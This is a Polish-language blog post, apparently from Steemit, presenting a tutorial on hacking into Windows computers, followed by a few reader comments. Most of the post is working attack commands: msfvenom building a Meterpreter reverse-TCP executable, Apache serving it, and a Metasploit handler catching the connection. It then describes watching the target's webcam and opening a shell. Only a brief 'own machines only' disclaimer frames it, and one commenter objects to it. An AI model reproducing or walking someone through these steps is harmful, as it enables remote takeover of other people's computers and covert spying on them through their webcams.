Cześć! Ciekawiło cię kiedyś jak włamać się na inny komputer z systemem Windows? Tak? To zaraz się dowiesz jak. Zapraszam do poradnika.
Z góry uprzedzam, że włamanie się na czyiś komputer to przestępstwo, także rób to tylko na swoich komputerach i w swojej sieci.
To na początek czego potrzebujesz:
Maszyny wirtualnej, czyli musisz zainstalować VirtualBoxa, jest to program, który umożliwia stworzenie maszyny wirtualnej, na której zainstalujesz odpowiedni system operacyjny. Program pobierzesz klikając w następujący link: http://download.virtualbox.org/virtualbox/5.2.4/VirtualBox-5.2.4-119785-Win.exe
Systemu operacyjnego kali linux, można pobrać go z oficjalnej strony, ja podam link do skonfigurowanej maszyny wirtualnej, wystarczy otworzyć klikając dwukrotnie na ikonę, jednakże potrzebny jest utorrent ,bądź bittorrent do pobrania.
Gdy już otworzysz pobrany plik z torrentów otworzy się twój system, musisz jeszcze wejść w ustawienia, klikając na niego prawym przyciskiem myszy i ustawić mostkowaną kartę sieciową, aby kali linux był w twojej sieci.
Dobra zaczynamy!
Uruchom maszynę wirt.
Zaloguj się do systemu. login: root hasło: toor
Uruchom terminal, tak mniej więcej wygląda jego ikona:
Wpisz komendę ifconfig i sprawdź swoje ip.
Wykorzystując narzędzie msfvenom utworzymy wirusa, którego następnie dostarczymy i na nasz target, czyli system, który chcemy kontrolować, wykorzystując protokół tcp. Aby to zrobić wpisujemy następującą komendę: " msfvenom -p windows/meterpreter/reverse_tcp LHOST=TWOJE_IP LPORT=885 -f exe R > wirus.exe ".
Teraz uruchamiamy apache2 czyli usługę, która utworzy lokalny serwer, wpisując " service apache2 start ". Następnie przeniesiemy naszego wirusa do katalogu serwera wpisując polecenie "mv /root/wirus.exe /var/www/html ".
Wyłączamy antywirusa i windows defender na targecie. ( można objeść antywirusa, ale to nie dzisiaj :) ).
Znowu wróć do kaliego i włącz framework-metasploit, po lewej stronie na pasku aplikacji. Tak wygląda ikonka:
.
Wpisz następujące komendy:
use exploit/multi/hander
set payload windows/meterpreter/reverse_tcp
set lhost "ip maszyny"
set lport ( taki jaki podaliśmy przy tworzeniu wirusa czyli 885 )
exploit
exploit się uruchomił, zostało ci włączyć wirusa.Na systemie, który ma zostać zainfekowany otwieramy przeglądarkę i wpisujemy adres ip naszej maszyny na której postawiony jest kali linux i podajemy ścieżkę do wirusa np. ( 192.168.1.10/wirus.exe ) pobieramy i otwieramy go.
Czekasz aż wszystko się załaduje i gotowe. Teraz możesz na przykład uruchomić kamerkę na targecie i oglądać przesyłany przez nią obraz, wpisując stream webcam_stream ( otworzy się przeglądarka z podglądem ), albo sprawdzić ip systemu wpisując " shell " -> " ipconfig ". Więcej komend po wpisaniu " help "
Jestem dobrym człowiekiem wiec nie zaplusuje :D ale zostawię taktyczny komentarz gdybym się rozmyślił :D
Downvoting a post can decrease pending rewards and make it less visible. Common reasons:
Submit
"Jak włamać się do Windows - Poradnik. (...) włamanie się na czyiś komputer to przestępstwo, także rób to tylko na swoich komputerach i w swojej sieci."
???
Już za tydzień: poradnik jak ukraść rower sąsiada. Kradzież to przestępstwo, więc kradnij tylko swoje rowery?
Nie lepiej napisać tekst o tym jak zabezpieczyć komputer przed tego typu atakami?
Downvoting a post can decrease pending rewards and make it less visible. Common reasons:
Submit
Tyle ,że niekumaci po przeczytaniu tego poradnika i tak nie będą potrafili włamać się do systemu poza swoją siecią. Więc... Poza tym ,żeby sprawdzić, czy zabezpieczenie przed atakiem takiego typu działa to trzeba je jeszcze przetestować.
Downvoting a post can decrease pending rewards and make it less visible. Common reasons:
Submit